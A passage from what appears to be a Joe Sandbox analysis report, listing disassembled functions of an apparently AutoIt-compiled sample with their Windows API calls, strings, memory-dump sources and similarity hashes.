Instruction ID: 816bf03ae142e5134245c343385a577bd4a96c572ca48911a4b2b53e5a629f3b
Opcode Fuzzy Hash: decb8c5208e82c7af60a54e733570bc173760080230e71801886db1fb7588d86
Instruction Fuzzy Hash: 97916870600605AFDB14DF64C884B6ABBE9FF48710F20956DFA4ADB2A1DBB0E841CB50

Function 00F0AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00EBFC86: _wcscpy.LIBCMT ref: 00EBFCA9

Part of subcall function 00EA9837: __itow.LIBCMT ref: 00EA9862
Part of subcall function 00EA9837: __swprintf.LIBCMT ref: 00EA98AC

__wcsnicmp.LIBCMT ref: 00F0B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F0B0F6

Strings

LPT, xrefs: 00F0B027

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 4a01666028b2d7e9d28dd506cd846a2e91466815c3e79e34e09de3f089cb6e1b
Instruction ID: 7d9f474c7373c783b187f4be671ef27d131b4418e5166cd9c094772f737d8016
Opcode Fuzzy Hash: 4a01666028b2d7e9d28dd506cd846a2e91466815c3e79e34e09de3f089cb6e1b
Instruction Fuzzy Hash: 04616F76E00219AFCB18DF94D891EAEB7F4EF09710F104169F916BB291D770AE84EB50

Function 00EB2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00EB2968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00EB2981

Strings

@, xrefs: 00EB2975

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 26b249e34ec65c2a385d0919ebc884ad3152e8c20b811b6cb23ae9d71b7877b7
Instruction ID: c942efd41149606e58310a41047f938738c80e83981f1bd655ebb07f3b662ab6
Opcode Fuzzy Hash: 26b249e34ec65c2a385d0919ebc884ad3152e8c20b811b6cb23ae9d71b7877b7
Instruction Fuzzy Hash: 4F516D714187449BD320EF10DC85BAFBBE8FF8A340F41885DF2D8550A1DB309529DB56

Function 00F09734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00EA4F0B: __fread_nolock.LIBCMT ref: 00EA4F29

_wcscmp.LIBCMT ref: 00F09824
_wcscmp.LIBCMT ref: 00F09837

Strings

FILE, xrefs: 00F09770

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: fb734249fbb5653c549ea7e53c93a66f387be979a283d0a3a322ecd3f6dfa229
Instruction ID: f82d9179954110eb97ef3326a5a4c5676e4be91f5c609d52fdcbab9c26d9a3a8
Opcode Fuzzy Hash: fb734249fbb5653c549ea7e53c93a66f387be979a283d0a3a322ecd3f6dfa229
Instruction Fuzzy Hash: 0A41C975A04209BADF219AA0CC45FEFB7FDDFCA710F014469F904BB1C1EAB1A9059B61

Function 00F1258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F1259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F125D4

Strings

|, xrefs: 00F125A5

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 25f4fd4344ec17920653275a1df1ba478b56a62238b683cd7e18ab641d457df4
Instruction ID: e482fd74b1b3c47e0d492118c00f0ee349d96454d994ee9efa8cef1232afbb18
Opcode Fuzzy Hash: 25f4fd4344ec17920653275a1df1ba478b56a62238b683cd7e18ab641d457df4
Instruction Fuzzy Hash: 0D310971800119EBCF11EFA1CC85EEEBFB9FF09350F10105AF955BA162EA315956DB60

Function 00F27A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00F27B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F27B76

Strings

', xrefs: 00F27ACA

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 857ac6fb285cabc482407071610ebd5b4a6d7be0b3ec6fbba847e653987cb674
Instruction ID: f2c81f07e50000613a33b23eb46f1ed16872bb7cbabc7c1a6dfd0b6f42b4e112
Opcode Fuzzy Hash: 857ac6fb285cabc482407071610ebd5b4a6d7be0b3ec6fbba847e653987cb674
Instruction Fuzzy Hash: 7F414774A0531A9FDB10DF68D880BEABBB5FB08310F10016AE904EB391D770A941DF90

Function 00F26A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00F26B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F26B53

Strings

static, xrefs: 00F26AB3

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 484447c42b6d44786b96e3e697550d8b6cacb27afa6c27b39d8fdafd1bcaeda0
Instruction ID: 32e489e552a599c31910565b7ffbf9339367e94b65357fabc746087562c2a4a6
Opcode Fuzzy Hash: 484447c42b6d44786b96e3e697550d8b6cacb27afa6c27b39d8fdafd1bcaeda0
Instruction Fuzzy Hash: 3E31C171100214AEDB109F24DC80BFB77B9FF88720F108529F9A5D7190DB34AC81EB60

Function 00F028A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F02911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F0294C

Strings

0, xrefs: 00F0290A

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 2e3e873256fc90e470cbb2d479e49b7353502e45edf6aff25c73cc19035de987
Instruction ID: 90d1f33ac5b05985229e21f2d20645f3e0476b674b5e8beb6c2fb99a1a31c268
Opcode Fuzzy Hash: 2e3e873256fc90e470cbb2d479e49b7353502e45edf6aff25c73cc19035de987
Instruction Fuzzy Hash: 4D31A531A003059FEF64CF98C949BAEBBF9EF45360F144029E985A61E1D7709944FB61

Function 00F139E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00F13A66

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

Strings

, $, xrefs: 00F13AA6
AUTOITCALLVARIABLE%d, xrefs: 00F13A58

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: b189734ff012212f930daa58eccccc9ec8329f5d335a4b82adc5422fbe1183cd
Instruction ID: 8759a9d52e5d63395fc0a7b95678620fd80c36d4af01d2b10dc9d9ded4ef143a
Opcode Fuzzy Hash: b189734ff012212f930daa58eccccc9ec8329f5d335a4b82adc5422fbe1183cd
Instruction Fuzzy Hash: 02219135A00219ABCF10EF64CC82EEEB7F5AF49310F400454F945BB182DB34EA46DB61

Function 00F266D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F26761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F2676C

Strings

Combobox, xrefs: 00F2672E

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 8b48bb23214edb21af39214ad2e13372b11f81d5f48df9672a0c4727b5c837c8
Instruction ID: e8ae65861a4bef737fb4dbd4fdddd09167876db016ddc6c5b1ee9e86f18f400f
Opcode Fuzzy Hash: 8b48bb23214edb21af39214ad2e13372b11f81d5f48df9672a0c4727b5c837c8
Instruction Fuzzy Hash: C511C475700218AFEF21CF54EC81EBB3B6AEB49368F100129F914DB290DA75DC51A7A0

Function 00F26C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00EA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EA1D73
Part of subcall function 00EA1D35: GetStockObject.GDI32(00000011), ref: 00EA1D87
Part of subcall function 00EA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EA1D91

GetWindowRect.USER32(00000000,?), ref: 00F26C71
GetSysColor.USER32(00000012), ref: 00F26C8B

Strings

static, xrefs: 00F26C4E

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 9fb32e9827be047cde3e13dc37b399f490771c47fc58259954e7501f61b5780a
Instruction ID: 8a5ae9cf6fa7dda58f939c8b9c634375f5be523bee1998594225bbc402c629fa
Opcode Fuzzy Hash: 9fb32e9827be047cde3e13dc37b399f490771c47fc58259954e7501f61b5780a
Instruction Fuzzy Hash: E5215972920219AFDF04DFA8DC45EEA7BB8FB08315F004628FD95E2250D735E851EB60

Function 00F26920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00F269A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F269B1

Strings

edit, xrefs: 00F26986

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 74e66255c8cf159aed10d7b197e39e5a5c2ad1d03701a03e1ffac88b00126b8b
Instruction ID: 4eec2dac5cd589daac9d5d77728b24272023bd315e5e3c49d1797ad5bc294ed4
Opcode Fuzzy Hash: 74e66255c8cf159aed10d7b197e39e5a5c2ad1d03701a03e1ffac88b00126b8b
Instruction Fuzzy Hash: 4C11BF71910128ABEB108F64EC41EEB37A9EB05374F104724F9A1D71E0CB35DC95BB60

Function 00F029AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F02A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F02A41

Strings

0, xrefs: 00F02A18

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 3a80d7dc4e2fd6a1da568637dbf99f82eaae780dad9f5bcdad1c610d9faec89c
Instruction ID: 13b44c19bc13d2623dad44cf274fe2d30ae21cb2e985815ef120a1c487f586b2
Opcode Fuzzy Hash: 3a80d7dc4e2fd6a1da568637dbf99f82eaae780dad9f5bcdad1c610d9faec89c
Instruction Fuzzy Hash: C511E632E01128ABCF70DF98DC48B9A77B8AB46360F144061E855F72D0DB74AD0AF7A1

Function 00F121D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F1222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F12255

Strings

<local>, xrefs: 00F1221D

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 1b646d35ff4fada90771ec756fd07377d6a474586b8c9eeffa9a4df008761830
Instruction ID: 2fd32c7665eef3528dcc85f0c6c8f8f518a9e88a7d47daf297a225de57719856
Opcode Fuzzy Hash: 1b646d35ff4fada90771ec756fd07377d6a474586b8c9eeffa9a4df008761830
Instruction Fuzzy Hash: 1C11E370901265BAEB248F918C84FFBFBA8FF06361F10822AF90456000E37059E5FAF0

Function 00EF8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

Part of subcall function 00EFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00EFAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EF8E73

Strings

ListBox, xrefs: 00EF8E3D
ComboBox, xrefs: 00EF8E12

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 9fe0996f3d176d02615695db7f458db76134f2b58134361f956ca96354d645a9
Instruction ID: 9b7a51a9c202944f8a38be20ab647326ad7ce5dbb559a4b0325dfd0266ca6787
Opcode Fuzzy Hash: 9fe0996f3d176d02615695db7f458db76134f2b58134361f956ca96354d645a9
Instruction Fuzzy Hash: 9101F1B160121CAB8B14EBA0CC458FE77A8EF0A320B141A19B9757B2E1EE31680CD650

Function 00EF8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

Part of subcall function 00EFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00EFAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00EF8D6B

Strings

ListBox, xrefs: 00EF8D35
ComboBox, xrefs: 00EF8D0A

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 957f0c9a40f1ad4d26d68cc9e05dc570764f4a065b50e2f791b384609fed24b5
Instruction ID: 9f37b6277d291cbf25f5c2d78a959b691ec55fb91f0ce985f2e088abf3625e43
Opcode Fuzzy Hash: 957f0c9a40f1ad4d26d68cc9e05dc570764f4a065b50e2f791b384609fed24b5
Instruction Fuzzy Hash: F301B1B1A4120CABCB24EBA0CA52AFE77AC9F1A340F141029BA457B291DE255A0C9261

Function 00EF8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

Part of subcall function 00EFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00EFAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00EF8DEE

Strings

ListBox, xrefs: 00EF8DBA
ComboBox, xrefs: 00EF8D8F

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 3436c011dcba36d2151c41ef8de1d12e7881eeba419390863b5e82795fead0e7
Instruction ID: 4db539724d19f81c1fbb7e6c9f28ef4109420849525ca2e0317d71f3d004146e
Opcode Fuzzy Hash: 3436c011dcba36d2151c41ef8de1d12e7881eeba419390863b5e82795fead0e7
Instruction Fuzzy Hash: 4C01A7B1A4120DA7DB25E6A4CA42EFF77ECDF16340F141025B9457B291DE255E0CE271

Function 00F04F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00F04F46
_wcscmp.LIBCMT ref: 00F04F58

Strings

#32770, xrefs: 00F04F52

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 8125afcb3ffc371295d670cdc89a53bcde3b80087fb41c08fc1c1f9a2418040a
Instruction ID: 9a0650942a1c26d299ce87cd908f5b4c5f1a2068377d4e3428b7edf1ec7d322f
Opcode Fuzzy Hash: 8125afcb3ffc371295d670cdc89a53bcde3b80087fb41c08fc1c1f9a2418040a
Instruction Fuzzy Hash: 5BE09B3250022D27D72096559C45FA7F7ACDB45B71F000066FD04D7051D560AA4697D1

Function 00EDB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00EDB314: _memset.LIBCMT ref: 00EDB321

Part of subcall function 00EC0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00EDB2F0,?,?,?,00EA100A), ref: 00EC0945

IsDebuggerPresent.KERNEL32(?,?,?,00EA100A), ref: 00EDB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00EA100A), ref: 00EDB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EDB2FE

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

